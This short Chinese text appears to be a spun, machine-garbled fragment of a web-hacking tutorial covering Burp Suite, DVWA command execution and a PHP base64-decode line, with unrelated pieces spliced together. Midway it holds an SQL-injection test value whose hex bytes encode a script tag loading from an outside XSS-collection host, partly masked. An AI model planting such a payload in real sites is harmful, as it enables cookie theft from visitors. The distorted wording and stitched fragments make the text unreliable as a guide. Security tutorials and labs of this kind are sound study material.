Burp Suite是一个强壮的Web进犯归纳渠道，其运用也比较复杂，这儿首要用到它的抓包功用。 Burp Suite要根据Java环境运转，因此还需要在黑客主机中装置Java。 import javax.naming.InitialContext;$at_id=base64_decode($_REQUEST['id']);//获取变量id并进行解码test: '),(0x3C73637269707***********3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F),('

首要仍是将DVWA Security设置为Low，挑选Command Execution，这儿在文本框中输入一个IP，点击Submmit提交便能够履行ping指令。